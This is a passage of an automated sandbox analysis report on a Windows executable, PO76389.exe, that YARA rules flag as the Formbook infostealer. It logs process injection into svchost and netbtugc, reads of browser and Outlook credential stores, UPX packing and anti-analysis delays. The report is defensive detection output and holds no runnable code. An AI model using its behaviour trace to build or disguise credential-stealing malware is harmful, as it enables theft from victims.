            Source: PO76389.exe, 00000000.00000003.2093249461.0000000003FB3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO76389.exe
            Source: PO76389.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.2520000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.2520000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.4571538439.0000000005500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2532350499.0000000002520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2532645690.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.4568125135.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2533022520.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.4568413195.00000000028A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.4568496807.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4569325211.0000000002580000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@14/9
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004FD712 GetLastError,FormatMessageW,0_2_004FD712
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004EB8B0 AdjustTokenPrivileges,CloseHandle,0_2_004EB8B0
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004EBEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_004EBEC3
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004FEA85 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_004FEA85
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004F6F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_004F6F5B
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_0050C604 CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_0050C604
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004B31F2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_004B31F2
            Source: C:\Users\user\Desktop\PO76389.exeFile created: C:\Users\user\AppData\Local\Temp\autF7F4.tmpJump to behavior
            Source: C:\Users\user\Desktop\PO76389.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\PO76389.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: netbtugc.exe, 00000005.00000002.4568560118.00000000029E5000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.4568560118.0000000002A11000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.4568560118.00000000029EF000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2775801131.00000000029E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: PO76389.exeReversingLabs: Detection: 76%
            Source: PO76389.exeVirustotal: Detection: 73%
            Source: unknownProcess created: C:\Users\user\Desktop\PO76389.exe "C:\Users\user\Desktop\PO76389.exe"
            Source: C:\Users\user\Desktop\PO76389.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO76389.exe"
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\PO76389.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO76389.exe"Jump to behavior
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\PO76389.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\PO76389.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PO76389.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\PO76389.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\PO76389.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\PO76389.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\PO76389.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\PO76389.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\PO76389.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\PO76389.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\PO76389.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\PO76389.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\PO76389.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\PO76389.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\PO76389.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: TrBUxuahdhJ.exe, 00000004.00000002.4568774085.000000000092E000.00000002.00000001.01000000.00000005.sdmp, TrBUxuahdhJ.exe, 00000007.00000002.4568123137.000000000092E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO76389.exe, 00000000.00000003.2095622015.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, PO76389.exe, 00000000.00000003.2095758118.0000000004080000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2436241382.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438409561.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2532684950.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2532684950.0000000003100000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.4569857221.00000000030FE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2532291355.0000000002BFF000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2535225271.0000000002DAF000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.4569857221.0000000002F60000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PO76389.exe, 00000000.00000003.2095622015.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, PO76389.exe, 00000000.00000003.2095758118.0000000004080000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2436241382.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438409561.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2532684950.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2532684950.0000000003100000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000005.00000002.4569857221.00000000030FE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2532291355.0000000002BFF000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2535225271.0000000002DAF000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.4569857221.0000000002F60000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.2532476916.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500493554.0000000002A13000.00000004.00000020.00020000.00000000.sdmp, TrBUxuahdhJ.exe, 00000004.00000003.2467006248.00000000007FB000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000002.2532476916.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500493554.0000000002A13000.00000004.00000020.00020000.00000000.sdmp, TrBUxuahdhJ.exe, 00000004.00000003.2467006248.00000000007FB000.00000004.00000001.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_005EB090 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_005EB090
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_005405A8 push ss; ret 0_2_005405A9
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004D7795 push ecx; ret 0_2_004D77A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0252A883 push FFFFFFC7h; retf 2_2_0252AA9A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_025236B0 push eax; ret 2_2_025236B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0252AEA4 push cs; retf 2_2_0252AEAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_025287F2 push ecx; iretd 2_2_025287FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031309AD push ecx; mov dword ptr [esp], ecx2_2_031309B6
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeCode function: 4_2_027B1A17 push cs; retf 4_2_027B1A1F
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeCode function: 4_2_027AF365 push ecx; iretd 4_2_027AF36E
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exeCode function: 4_2_027BCBEE push eax; ret 4_2_027BCBFE
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02F6225F pushad ; ret 5_2_02F627F9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02F627FA pushad ; ret 5_2_02F627F9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02F6283D push eax; iretd 5_2_02F62858
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02F909AD push ecx; mov dword ptr [esp], ecx5_2_02F909B6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02F61368 push eax; iretd 5_2_02F61369
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0062017D push ebp; ret 5_2_006201F3
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_00620ACF push ds; iretd 5_2_00620AD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_00620AAF push es; iretd 5_2_00620AB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_006110B0 push es; retf 6D50h5_2_0061119D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0060513F push ecx; iretd 5_2_00605148
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_006071D0 push FFFFFFC7h; retf 5_2_006073E7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0061D1B3 push ebx; iretd 5_2_0061D1C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_006077F1 push cs; retf 5_2_006077F9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_00623C70 push edi; iretd 5_2_00623C7B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0060DDC3 push ss; rep ret 5_2_0060DDC1
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0060DDB9 push ss; rep ret 5_2_0060DDC1
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02CAD23A pushad ; ret 5_2_02CAD23C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02CA638E push cx; retf 5_2_02CA6390
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02CA70C9 push es; retf 5_2_02CA70D5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02CA50E3 push 86FB9775h; ret 5_2_02CA50EA
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02CAEFC8 push ebx; iretd 5_2_02CAF03E
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004CF78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004CF78E
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_00517F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00517F0E
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004D1E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004D1E5A
            Source: C:\Users\user\Desktop\PO76389.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\PO76389.exeAPI/Special instruction interceptor: Address: DA261C
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AD1C0 rdtsc 2_2_031AD1C0
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 9841Jump to behavior
            Source: C:\Users\user\Desktop\PO76389.exeEvaded block: after key decisiongraph_0-104527
            Source: C:\Users\user\Desktop\PO76389.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-104979
            Source: C:\Users\user\Desktop\PO76389.exeAPI coverage: 4.6 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.8 %
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI coverage: 2.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 1292Thread sleep count: 131 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 1292Thread sleep time: -262000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 1292Thread sleep count: 9841 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 1292Thread sleep time: -19682000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe TID: 2072Thread sleep time: -65000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe TID: 2072Thread sleep time: -40500s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe TID: 2072Thread sleep count: 36 > 30Jump to behavior
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe TID: 2072Thread sleep time: -36000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004CDD92 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004CDD92
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_00502044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00502044
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_0050219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0050219F
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_005024A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_005024A9
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004F6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_004F6B3F
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004F6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_004F6E4A
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004FF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_004FF350
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004FFD47 FindFirstFileW,FindClose,0_2_004FFD47
            Source: C:\Users\user\Desktop\PO76389.exeCode function: 0_2_004FFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004FFDD2
